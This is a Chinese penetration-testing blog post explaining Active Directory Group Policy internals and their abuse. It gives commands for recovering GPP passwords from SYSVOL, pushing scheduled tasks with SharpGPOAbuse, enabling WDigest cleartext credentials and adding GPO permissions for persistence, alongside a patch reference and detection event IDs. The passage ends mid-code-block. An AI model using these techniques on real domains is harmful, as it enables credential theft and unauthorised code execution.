<!DOCTYPE html>
<html lang="zh-CN" data-theme="dark">
    <head prefix="og: http://ogp.me/ns# article: http://ogp.me/ns/article#">
    <meta charset="UTF-8" />

    <meta name="generator" content="Hugo 0.88.1" /><meta name="theme-color" content="#16171d" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    
    <meta name="format-detection" content="telephone=no, date=no, address=no, email=no" />
    
    <meta http-equiv="Cache-Control" content="no-transform" />
    
    <meta http-equiv="Cache-Control" content="no-siteapp" />

    <title>组策略利用与横向移动 | MYZXCG</title>

    <link rel="stylesheet" href="/css/meme.min.ee7d92038178eda958210f69458541e2686ada11055b93762d6d324f2acc47c5.css"/>

    
    
        <script src="/js/meme.min.4194bf2034241e3757fbbbf5fe4db43d0ff17c81f4496e6bc931504f0978cbd2.js"></script>

    

    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />

        <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=EB&#43;Garamond:ital,wght@0,400;0,500;0,700;1,400;1,700&amp;family=Noto&#43;Serif&#43;SC:wght@400;500;700&amp;family=Source&#43;Code&#43;Pro:ital,wght@0,400;0,700;1,400;1,700&amp;display=swap" media="print" onload="this.media='all'" />
        <noscript><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=EB&#43;Garamond:ital,wght@0,400;0,500;0,700;1,400;1,700&amp;family=Noto&#43;Serif&#43;SC:wght@400;500;700&amp;family=Source&#43;Code&#43;Pro:ital,wght@0,400;0,700;1,400;1,700&amp;display=swap" /></noscript>

    <meta name="author" content="myzxcg" /><meta name="description" content="组策略介绍 组策略可以控制用户帐户和计算机帐户的工作环境，提供了操作系统、应用程序和活……" />

    <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg" color="" />
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png" />
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-title" content="MYZXCG" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black" />
    <meta name="mobile-web-app-capable" content="yes" />
    <meta name="application-name" content="MYZXCG" />
    <meta name="msapplication-starturl" content="../../../" />
    <meta name="msapplication-TileColor" content="#603cba" />
    <meta name="msapplication-TileImage" content="../../../icons/mstile-150x150.png" />
    <link rel="manifest" href="/manifest.json" />


    
    

    
    <link rel="canonical" href="https://myzxcg.com/2021/09/%E7%BB%84%E7%AD%96%E7%95%A5%E5%88%A9%E7%94%A8%E4%B8%8E%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/" />
    

<script type="application/ld+json">
    {
        "@context": "https://schema.org",
        "@type": "BlogPosting",
        "datePublished": "2021-09-05T09:09:39+08:00",
        "dateModified": "2021-11-21T16:44:42+08:00",
        "url": "https://myzxcg.com/2021/09/%E7%BB%84%E7%AD%96%E7%95%A5%E5%88%A9%E7%94%A8%E4%B8%8E%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/",
        "headline": "组策略利用与横向移动",
        "description": "组策略介绍 组策略可以控制用户帐户和计算机帐户的工作环境，提供了操作系统、应用程序和活……",
        "inLanguage" : "zh-CN",
        "articleSection": "posts",
        "wordCount":  4279 ,
        "image": ["https://myzxcg.com/images/image-1630806218.png","https://myzxcg.com/images/image-1630806361.png","https://myzxcg.com/images/image-1630806472.png","https://myzxcg.com/images/image-1630806575.png","https://myzxcg.com/images/image-1630806621.png","https://myzxcg.com/images/image-1630806683.png","https://myzxcg.com/images/image-1630806855.png","https://myzxcg.com/images/image-1630807144.png","https://myzxcg.com/images/image-1630807215.png"],
        "author": {
            "@type": "Person",
            "description": "专注于Web安全、内网渗透. 记录学习与渗透过程中遇到的有意思的点, 分享技巧与知识. 欢迎交流～",
            "email": "myzx.xcg@gmail.com",
            "image": "https://myzxcg.com/avatar.png",
            "url": "https://myzxcg.com/",
            "name": "myzxcg"
        },
        "license": "[CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh)",
        "publisher": {
            "@type": "Organization",
            "name": "MYZXCG",
            "logo": {
                "@type": "ImageObject",
                "url": "https://myzxcg.com/icons/favicon.ico"
            },
            "url": "https://myzxcg.com/"
        },
        "mainEntityOfPage": {
            "@type": "WebSite",
            "@id": "https://myzxcg.com/"
        }
    }
</script>

    

<meta name="twitter:card" content="summary_large_image" />


<meta name="twitter:site" content="@myzxcg" />
<meta name="twitter:creator" content="@myzxcg" />

    



<meta property="og:title" content="组策略利用与横向移动" />
<meta property="og:description" content="组策略介绍 组策略可以控制用户帐户和计算机帐户的工作环境，提供了操作系统、应用程序和活……" />
<meta property="og:url" content="https://myzxcg.com/2021/09/%E7%BB%84%E7%AD%96%E7%95%A5%E5%88%A9%E7%94%A8%E4%B8%8E%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/" />
<meta property="og:site_name" content="MYZXCG" />
<meta property="og:locale" content="zh" /><meta property="og:image" content="https://myzxcg.com/images/image-1630806218.png" />
<meta property="og:type" content="article" />
    <meta property="article:published_time" content="2021-09-05T09:09:39&#43;08:00" />
    <meta property="article:modified_time" content="2021-11-21T16:44:42&#43;08:00" />
    
    <meta property="article:section" content="posts" />


        <link rel="preconnect" href="https://www.google-analytics.com" crossorigin />

        


    
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-Y0LZRMN44V"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());

        gtag('config', 'G-Y0LZRMN44V');
    </script>




    
    

    
</head>

    <body>
        <div class="container">
            
    <header class="header">
        
            <div class="header-wrapper">
                <div class="header-inner single">
                    
    <div class="site-brand">
        
            <a href="/" class="brand">MYZXCG</a>
        
    </div>

                    <nav class="nav">
    <ul class="menu" id="menu">
        
            
        
        
        
        
            
                <li class="menu-item"><a href="/archives/"><span class="menu-item-name">文章</span></a>
                </li>
            
        
            
                <li class="menu-item"><a href="/tags/"><span class="menu-item-name">标签</span></a>
                </li>
            
        
            
                <li class="menu-item"><a href="/about/"><span class="menu-item-name">关于</span></a>
                </li>
            
        
            
                
                    
                    
                
            
        
            
                
            
        
    </ul>
</nav>

                    
                </div>
            </div>
            
    <input type="checkbox" id="nav-toggle" aria-hidden="true" />
    <label for="nav-toggle" class="nav-toggle"></label>
    <label for="nav-toggle" class="nav-curtain"></label>


        
    </header>




            
            
    <main class="main single" id="main">
    <div class="main-inner">

        

        <article class="content post h-entry" data-align="justify" data-type="posts" data-toc-num="true">

            <h1 class="post-title p-name">组策略利用与横向移动</h1>

            

            
                
            

            
                

<div class="post-meta">
    
        
        <time datetime="2021-09-05T09:09:39&#43;08:00" class="post-meta-item published dt-published"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" class="icon post-meta-icon"><path d="M400 64h-48V12c0-6.627-5.373-12-12-12h-40c-6.627 0-12 5.373-12 12v52H160V12c0-6.627-5.373-12-12-12h-40c-6.627 0-12 5.373-12 12v52H48C21.49 64 0 85.49 0 112v352c0 26.51 21.49 48 48 48h352c26.51 0 48-21.49 48-48V112c0-26.51-21.49-48-48-48zm-6 400H54a6 6 0 0 1-6-6V160h352v298a6 6 0 0 1-6 6zm-52.849-200.65L198.842 404.519c-4.705 4.667-12.303 4.637-16.971-.068l-75.091-75.699c-4.667-4.705-4.637-12.303.068-16.971l22.719-22.536c4.705-4.667 12.303-4.637 16.97.069l44.104 44.461 111.072-110.181c4.705-4.667 12.303-4.637 16.971.068l22.536 22.718c4.667 4.705 4.636 12.303-.069 16.97z"/></svg>&nbsp;2021.9.5</time>
    
    
    
    
        
        
        
            
        
    
    
    
        
        <span class="post-meta-item reading-time"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon post-meta-icon"><path d="M256 8C119 8 8 119 8 256s111 248 248 248 248-111 248-248S393 8 256 8zm0 448c-110.5 0-200-89.5-200-200S145.5 56 256 56s200 89.5 200 200-89.5 200-200 200zm61.8-104.4l-84.9-61.7c-3.1-2.3-4.9-5.9-4.9-9.7V116c0-6.6 5.4-12 12-12h32c6.6 0 12 5.4 12 12v141.7l66.8 48.6c5.4 3.9 6.5 11.4 2.6 16.8L334.6 349c-3.9 5.3-11.4 6.5-16.8 2.6z"/></svg>&nbsp;9&nbsp;分钟</span>
    

   
    

    
    
</div>

            

            <nav class="contents">
  <h2 id="contents" class="contents-title">目录</h2><ol class="toc">
    <li><a id="contents:组策略介绍" href="#组策略介绍">组策略介绍</a>
      <ol>
        <li><a id="contents:组策略链接" href="#组策略链接">组策略链接</a></li>
        <li><a id="contents:组策略内容" href="#组策略内容">组策略内容</a></li>
        <li><a id="contents:组策略更新" href="#组策略更新">组策略更新</a></li>
        <li><a id="contents:组策略存储" href="#组策略存储">组策略存储</a></li>
      </ol>
    </li>
    <li><a id="contents:组策略利用" href="#组策略利用">组策略利用</a>
      <ol>
        <li><a id="contents:gpo-导出与备份" href="#gpo-导出与备份">GPO 导出与备份</a></li>
        <li><a id="contents:利用sysvol还原组策略中的密码" href="#利用sysvol还原组策略中的密码">利用SYSVOL还原组策略中的密码</a></li>
        <li><a id="contents:组策略横向" href="#组策略横向">组策略横向</a></li>
      </ol>
    </li>
    <li><a id="contents:组策略权限维持" href="#组策略权限维持">组策略权限维持</a>
      <ol>
        <li><a id="contents:创建gpo的权限" href="#创建gpo的权限">创建GPO的权限</a></li>
        <li><a id="contents:修改现有的gpo的权限" href="#修改现有的gpo的权限">修改现有的GPO的权限</a></li>
        <li><a id="contents:seenabledelegationprivilege-特权" href="#seenabledelegationprivilege-特权">SeEnableDelegationPrivilege 特权</a></li>
      </ol>
    </li>
    <li><a id="contents:参考" href="#参考">参考</a></li>
  </ol>
</nav><div class="post-body e-content">
                <h2 id="组策略介绍"><a href="#组策略介绍" class="anchor-link">#</a><a href="#contents:组策略介绍" class="headings">组策略介绍</a></h2>
<blockquote>
<p>组策略可以控制用户帐户和计算机帐户的工作环境，提供了操作系统、应用程序和活动目录中用户设置的集中化管理和配置。</p>
</blockquote>
<p>组策略可分为本机组策略和域的组策略：</p>
<ul>
<li>本机组策略用于计算机管理员统一管理本机以及所有用户。</li>
<li>域内的组策略用于域管统一管理域内的所有计算机以及域用户。</li>
</ul>
<h3 id="组策略链接"><a href="#组策略链接" class="anchor-link">#</a><a href="#contents:组策略链接" class="headings">组策略链接</a></h3>
<p>以<code>Default Domain Policy</code>为例，在右边的作用域里面，可以看到它链接到test.local整个域，也就是说在test.local域内的所有计算机，用户都会受到这条组策略的影响。链接的位置可以是站点、域以及OU。</p>
<p><img src="/images/image-1630806218.png" alt=""></p>
<p>比如说财务桌面壁纸这条组策略。它就链接到财务这个OU。加入财务这个OU的所有计算机以及用户会受到影响。</p>
<p><img src="/images/image-1630806361.png" alt=""></p>
<h3 id="组策略内容"><a href="#组策略内容" class="anchor-link">#</a><a href="#contents:组策略内容" class="headings">组策略内容</a></h3>
<p>打开组策略编辑器，可以看到分为计算机配置以及用户配置，分别作用于计算机和用户。</p>
<p><img src="/images/image-1630806472.png" alt=""></p>
<p>在配置下又分为策略以及首选项。</p>
<p>首选项是Windows Server 2008发布后用来对GPO中的组策略提供额外的功能。<strong>策略和首选项的不同之处就在于强制性。策略是受管理的、强制实施的。而首选项则是不受管理的、非强制性的。</strong></p>
<p>对于很多系统设置来说，既可以通过策略设置来实现，也可以通过策略首选项来实现，二者有相当一部分的重叠。</p>
<h3 id="组策略更新"><a href="#组策略更新" class="anchor-link">#</a><a href="#contents:组策略更新" class="headings">组策略更新</a></h3>
<p>默认情况下，客户端更新组策略的方式主要有</p>
<ol>
<li>
<p>后台轮询检查sysvol里的GPT.ini，如果版本高于本地保存的组策略版本，客户端将会更新本地的组策略。轮询的时间是，默认情况下，计算机组策略会在后台每隔 90 分钟更新一次，并将时间作 0 到 30 分钟的随机调整。域控制器上的组策略会每隔 5 分钟更新一次。</p>
</li>
<li>
<p>用户开机登录时会检查sysvol里的GPT.ini，如果高于本地保存的组策略版本，将会更新本地的组策略。</p>
</li>
<li>
<p>客户端强制更新，执行<code>gpupdate /force</code>。</p>
<p>域控强制客户端更新（不会比较域共享目录中组策略的版本）执行 <code>Invoke-GPUpdate -Computer &quot;TESTwin10&quot; -Target &quot;User&quot;</code> （2008 R2默认不支持该命令，2012支持）</p>
</li>
</ol>
<p>组策略应用顺序：</p>
<p>应用本地组策略 →如果有站点组策略则应用→应用域策略→应用OU上的策略。</p>
<p>如果同一个OU上链接了多个GPO，则按照链接顺序从高到低逐个应用。如果多个组策略设置冲突，则后应用的组策略覆盖先应用的组策略。</p>
<h3 id="组策略存储"><a href="#组策略存储" class="anchor-link">#</a><a href="#contents:组策略存储" class="headings">组策略存储</a></h3>
<p>每条组策略可以看做是存储在域级别的一个虚拟对象，叫做GPO。每个GPO有唯一标志，用来标识每条组策略(或者说每个GPO)，GPO在域内存储分为两个部分：GPC、GPT。</p>
<p><img src="/images/image-1630806575.png" alt=""></p>
<p>GPC位于LDAP中，<code>CN=Policies,CN=System,&lt;BaseDn&gt;</code>下，每个条目对应一个GPC。包含了GPO属性，例如版本信息，GPO状态和其他组件设置。</p>
<p><img src="/images/image-1630806621.png" alt=""></p>
<p>GPT位于<code>\\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies</code>中。域内任何人都可以读取<code>\\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\</code>这个默认的共享路径下的内容。</p>
<p>GPC里面的gPCFileSysPath属性链接到GPT里面。GPT是一个文件系统文件夹，其中包含由.adm文件，安全设置，脚本文件以及有关可用于安装的应用程序的信息指定的策略数据。</p>
<p>在域、站点、OU上的gPLink属性来标识链接到这里的组策略，gPOptions属性来标识组策略是否会继承。</p>
<p><img src="/images/image-1630806683.png" alt=""></p>
<h2 id="组策略利用"><a href="#组策略利用" class="anchor-link">#</a><a href="#contents:组策略利用" class="headings">组策略利用</a></h2>
<h3 id="gpo-导出与备份"><a href="#gpo-导出与备份" class="anchor-link">#</a><a href="#contents:gpo-导出与备份" class="headings">GPO 导出与备份</a></h3>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c">#加载GroupPolicy模块 （win7没有，win10有）</span>
<span class="nb">Import-Module</span> <span class="n">GroupPolicy</span> <span class="err">–</span><span class="n">verbose</span>
<span class="c">#获得所有GPO的内容</span>
<span class="nb">Get-GPO</span> <span class="n">-All</span>
<span class="c">#将所有GPO导出为一个HTML报告</span>
<span class="nb">Get-GPOReport</span> <span class="n">-All</span> <span class="n">-ReportType</span> <span class="n">html</span> <span class="n">-Path</span> <span class="n">C:</span><span class="p">\</span><span class="n">GposReport</span><span class="p">\</span><span class="n">GposReport</span><span class="p">.</span><span class="n">html</span>
<span class="c">#将每个GPO单独导出一个HTML报告</span>
<span class="nb">Get-GPO</span> <span class="n">-All</span> <span class="p">|</span> <span class="p">%{</span>
<span class="nb">Get-GPOReport</span> <span class="n">-name</span> <span class="nv">$_</span><span class="p">.</span><span class="n">displayname</span> <span class="n">-ReportType</span> <span class="n">html</span> <span class="n">-path</span> <span class="p">(</span><span class="s2">&#34;c:\GPOReports\&#34;</span><span class="p">+</span><span class="nv">$_</span><span class="p">.</span><span class="n">displayname</span><span class="p">+</span><span class="s2">&#34;.html&#34;</span><span class="p">)</span>
<span class="p">}</span>
<span class="c">#查看指定GPO的权限设置</span>
<span class="nb">Get-GPPermission</span> <span class="n">-Name</span> <span class="s2">&#34;客服部组策略&#34;</span> <span class="n">-All</span> 
<span class="c">#备份指定GPO</span>
<span class="nb">Backup-Gpo</span> <span class="n">-Name</span> <span class="n">TestGPO1</span> <span class="n">-Path</span> <span class="n">C:</span><span class="p">\</span><span class="n">GpoBackups</span>
<span class="c">#备份所有GPO</span>
<span class="nb">Backup-Gpo</span> <span class="n">-All</span> <span class="n">-Path</span> <span class="s2">&#34;c:\GpoBackups&#34;</span>
<span class="c">#还原指定GPO</span>
<span class="nb">Restore-GPO</span> <span class="n">-Name</span> <span class="n">TestGPO1</span> <span class="n">-Path</span> <span class="n">C:</span><span class="p">\</span><span class="n">GpoBackups</span>
<span class="c">#还原所有GPO</span>
<span class="nb">Restore-GPO</span> <span class="n">-All</span> <span class="n">-Path</span> <span class="s2">&#34;c:\GpoBackups&#34;</span>
</code></pre></td></tr></table></div>
</div>
</div><h3 id="利用sysvol还原组策略中的密码"><a href="#利用sysvol还原组策略中的密码" class="anchor-link">#</a><a href="#contents:利用sysvol还原组策略中的密码" class="headings">利用SYSVOL还原组策略中的密码</a></h3>
<p>如果在组策略中输入了密码，如以用户身份运行程序、修改域内主机内置administrator用户密码等操作。</p>
<p><img src="/images/image-1630806855.png" alt=""></p>
<p>然后可以在GPT中看到加密后的密码（AES-256），而微软公开了解密私钥。</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-text" data-lang="text">C:\Windows\SYSVOL\domain\Policies\{0EA52652-3A0D-4135-8BD7-92EFF59CB765}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
</code></pre></td></tr></table></div>
</div>
</div><ol>
<li>
<p>可以通过以下命令来快速搜索
<code>findstr /S cpassword \\0day.org\sysvol\*.xml</code></p>
</li>
<li>
<p>利用<a href="https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1" target="_blank" rel="noopener">Get-GPPPassword</a>，自动查询共享文件夹\SYSVOL中的文件，还原出所有明文密码。</p>
<p><code>Get-GPPPassword</code></p>
</li>
</ol>
<p><strong>修复：打了补丁KB2962486后，组策略中无法设置用户名密码。</strong></p>
<h3 id="组策略横向"><a href="#组策略横向" class="anchor-link">#</a><a href="#contents:组策略横向" class="headings">组策略横向</a></h3>
<p>在拿到域控之后，有时候可能网络ACL到达不了目标电脑，可以通过组策略进行横向。攻击者可以利用组策略来推出恶意软件、创建/修改计划任务、降级凭据保护、向所有计算机添加新的本地帐户被添加到本地管理员组。更改现有的安全策略，启用明文密码提取。</p>
<ol>
<li>
<p>计划任务</p>
<p>自Windows Server 2008开始，GPO开始支持计划任务，便于管理域中的计算机和用户。</p>
<p><a href="https://github.com/FSecureLABS/SharpGPOAbuse" target="_blank" rel="noopener">指定用户配置定时任务</a></p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span><span class="lnt">8
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c">#加载GroupPolicy模块 （win7没有，win10有）</span>
<span class="nb">Import-Module</span> <span class="n">GroupPolicy</span>
<span class="c">#创建一个GPO并将GPO链接到域0day.org，需要域管权限。</span>
<span class="nb">new-gpo</span> <span class="n">-name</span> <span class="n">TestGPO2</span> <span class="p">|</span> <span class="nb">new-gplink</span> <span class="n">-Target</span> <span class="s2">&#34;dc=0day,dc=org&#34;</span>
<span class="c">#添加定时任务 --TargetDnsName指定计算机</span>
<span class="n">SharpGPOAbuse</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-AddComputerTask</span> <span class="p">-</span><span class="n">-TaskName</span> <span class="s2">&#34;Update2&#34;</span> <span class="p">-</span><span class="n">-Author</span> <span class="n">DOMAIN</span><span class="p">\\</span><span class="n">Admin</span> <span class="p">-</span><span class="n">-Command</span> <span class="s2">&#34;cmd.exe&#34;</span> <span class="p">-</span><span class="n">-Arguments</span> <span class="s2">&#34;/c calc.exe&#34;</span> <span class="p">-</span><span class="n">-GPOName</span> <span class="s2">&#34;TestGPO2&#34;</span> <span class="p">-</span><span class="n">-FilterEnabled</span> <span class="p">-</span><span class="n">-TargetDnsName</span> <span class="nb">PC-jack</span><span class="p">-</span><span class="n">0day</span><span class="p">.</span><span class="n">0day</span><span class="p">.</span><span class="n">org</span>
<span class="c">#删除GPO</span>
<span class="nb">Remove-GPO</span> <span class="n">-Name</span> <span class="n">TestGPO2</span>
</code></pre></td></tr></table></div>
</div>
</div></li>
<li>
<p>在&quot;软件安装&quot;下推出.msi</p>
</li>
<li>
<p>推出特定的启动脚本</p>
</li>
<li>
<p>将域帐户添加到本地管理员RDP组</p>
</li>
<li>
<p>降级凭据保护</p>
</li>
<li>
<p>更改现有的安全策略以启用明文密码提取</p>
<p>设置<code>HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest</code>下的<code>UseLogonCredentiald</code>值为1</p>
</li>
</ol>
<h2 id="组策略权限维持"><a href="#组策略权限维持" class="anchor-link">#</a><a href="#contents:组策略权限维持" class="headings">组策略权限维持</a></h2>
<h3 id="创建gpo的权限"><a href="#创建gpo的权限" class="anchor-link">#</a><a href="#contents:创建gpo的权限" class="headings">创建GPO的权限</a></h3>
<p>其实就是对<code>CN=Policies,CN=System,&lt;BaseDn&gt;</code>具备CreateChild的权限。</p>
<p>查询域内具备创建GPO的权限:</p>
<p><code>adfind -b CN=Policies,CN=System,DC=0day,DC=org -sddl+++ -s base -sdna -sddlfilter ;;&quot;CR CHILD&quot;;;;</code></p>
<ol>
<li>
<p>添加用户test1对TestGPO的完全访问权限</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="nv">$RawObject</span> <span class="p">=</span> <span class="nb">Get-DomainGPO</span> <span class="n">-Raw</span> <span class="n">-Identity</span> <span class="s1">&#39;TestGPO&#39;</span>
<span class="nv">$TargetObject</span> <span class="p">=</span> <span class="nv">$RawObject</span><span class="p">.</span><span class="n">GetDirectoryEntry</span><span class="p">()</span>
<span class="nv">$ACE</span> <span class="p">=</span> <span class="nb">New-ADObjectAccessControlEntry</span> <span class="n">-InheritanceType</span> <span class="n">All</span> <span class="n">-AccessControlType</span> <span class="n">Allow</span> <span class="n">-PrincipalIdentity</span> <span class="n">test1</span> <span class="n">-Right</span> <span class="n">AccessSystemSecurity</span><span class="p">,</span><span class="n">CreateChild</span><span class="p">,</span><span class="n">Delete</span><span class="p">,</span><span class="n">DeleteChild</span><span class="p">,</span><span class="n">DeleteTree</span><span class="p">,</span><span class="n">ExtendedRight</span><span class="p">,</span><span class="n">GenericAll</span><span class="p">,</span><span class="n">GenericExecute</span><span class="p">,</span><span class="n">GenericRead</span><span class="p">,</span><span class="n">GenericWrite</span><span class="p">,</span><span class="n">ListChildren</span><span class="p">,</span><span class="n">ListObject</span><span class="p">,</span><span class="n">ReadControl</span><span class="p">,</span><span class="n">ReadProperty</span><span class="p">,</span><span class="n">Self</span><span class="p">,</span><span class="n">Synchronize</span><span class="p">,</span><span class="n">WriteDacl</span><span class="p">,</span><span class="n">WriteOwner</span><span class="p">,</span><span class="n">WriteProperty</span>
<span class="nv">$TargetObject</span><span class="p">.</span><span class="n">PsBase</span><span class="p">.</span><span class="n">ObjectSecurity</span><span class="p">.</span><span class="n">AddAccessRule</span><span class="p">(</span><span class="nv">$ACE</span><span class="p">)</span>
<span class="nv">$TargetObject</span><span class="p">.</span><span class="n">PsBase</span><span class="p">.</span><span class="n">CommitChanges</span><span class="p">()</span>
</code></pre></td></tr></table></div>
</div>
</div></li>
<li>
<p>移除用户test1对TestGPO的完全访问权限</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="nv">$RawObject</span> <span class="p">=</span> <span class="nb">Get-DomainGPO</span> <span class="n">-Raw</span> <span class="n">-Identity</span> <span class="s1">&#39;TestGPO&#39;</span>
<span class="nv">$TargetObject</span> <span class="p">=</span> <span class="nv">$RawObject</span><span class="p">.</span><span class="n">GetDirectoryEntry</span><span class="p">()</span>
<span class="nv">$ACE</span> <span class="p">=</span> <span class="nb">New-ADObjectAccessControlEntry</span> <span class="n">-InheritanceType</span> <span class="n">All</span> <span class="n">-AccessControlType</span> <span class="n">Allow</span> <span class="n">-PrincipalIdentity</span> <span class="n">test1</span> <span class="n">-Right</span> <span class="n">AccessSystemSecurity</span><span class="p">,</span><span class="n">CreateChild</span><span class="p">,</span><span class="n">Delete</span><span class="p">,</span><span class="n">DeleteChild</span><span class="p">,</span><span class="n">DeleteTree</span><span class="p">,</span><span class="n">ExtendedRight</span><span class="p">,</span><span class="n">GenericAll</span><span class="p">,</span><span class="n">GenericExecute</span><span class="p">,</span><span class="n">GenericRead</span><span class="p">,</span><span class="n">GenericWrite</span><span class="p">,</span><span class="n">ListChildren</span><span class="p">,</span><span class="n">ListObject</span><span class="p">,</span><span class="n">ReadControl</span><span class="p">,</span><span class="n">ReadProperty</span><span class="p">,</span><span class="n">Self</span><span class="p">,</span><span class="n">Synchronize</span><span class="p">,</span><span class="n">WriteDacl</span><span class="p">,</span><span class="n">WriteOwner</span><span class="p">,</span><span class="n">WriteProperty</span>
<span class="nv">$TargetObject</span><span class="p">.</span><span class="n">PsBase</span><span class="p">.</span><span class="n">ObjectSecurity</span><span class="p">.</span><span class="n">RemoveAccessRule</span><span class="p">(</span><span class="nv">$ACE</span><span class="p">)</span>
<span class="nv">$TargetObject</span><span class="p">.</span><span class="n">PsBase</span><span class="p">.</span><span class="n">CommitChanges</span><span class="p">()</span>
</code></pre></td></tr></table></div>
</div>
</div></li>
</ol>
<p><strong>攻击检测</strong></p>
<p>事件5137，4662，5145，4674可以看到组策略的新增信息。</p>
<h3 id="修改现有的gpo的权限"><a href="#修改现有的gpo的权限" class="anchor-link">#</a><a href="#contents:修改现有的gpo的权限" class="headings">修改现有的GPO的权限</a></h3>
<p>如果组策略对象的修改或完全控制权限被分配给了某个用户，当该用户被攻击者拿下之后，攻击者利用该用户权限可以修改并配置特定的组策略来渗透攻击受该组策略作用的用户或计算机。</p>
<ol>
<li>
<p><strong>GPC链接到GPT的权限与修改GPT的权限</strong></p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c">#查找对gPCFileSysPath属性WriteProperty权限的用户</span>
<span class="n">adfind</span> <span class="n">-b</span> <span class="n">CN</span><span class="p">=</span><span class="n">Policies</span><span class="p">,</span><span class="n">CN</span><span class="p">=</span><span class="n">System</span><span class="p">,</span><span class="n">DC</span><span class="p">=</span><span class="n">0day</span><span class="p">,</span><span class="n">DC</span><span class="p">=</span><span class="n">org</span> <span class="n">nTSecurityDescriptor</span> <span class="n">-sddl</span><span class="p">+++</span> <span class="n">-s</span> <span class="n">subtree</span> <span class="n">-sdna</span> <span class="n">-sddlfilter</span> <span class="p">;;;</span><span class="n">gPCFileSysPath</span><span class="p">;;</span> <span class="n">-recmute</span>

<span class="c">#修改GPT的权限，由于GPT 是文件夹的形式，并不在LDAP里面，因此使用icacls查看。</span>
<span class="n">icacls</span> <span class="p">\\</span><span class="n">test</span><span class="p">.</span><span class="n">local</span><span class="p">\</span><span class="n">sysvol</span><span class="p">\</span><span class="n">test</span><span class="p">.</span><span class="n">local</span><span class="p">\</span><span class="n">scripts</span><span class="p">*</span>
<span class="n">icacls</span> <span class="p">\\</span><span class="n">test</span><span class="p">.</span><span class="n">localsysvol</span><span class="p">\</span><span class="n">test</span><span class="p">.</span><span class="n">local</span><span class="p">\</span><span class="n">policies</span><span class="p">*</span>
<span class="c">#对目录有修改权限的可以随意修改组策略配置</span>
</code></pre></td></tr></table></div>
</div>
</div></li>
<li>
<p><strong>GPO链接的权限</strong>
遍历所有的域、站点、OU上的所有ACE，如果有对gPLink属性或者gPOpptions属性的修改权限，就可以修改这个这个域/站点/OU链接的OU。</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c">#遍历服部这个OU,对gLink或者gPOpptions有WriteProperty权限的用户</span>
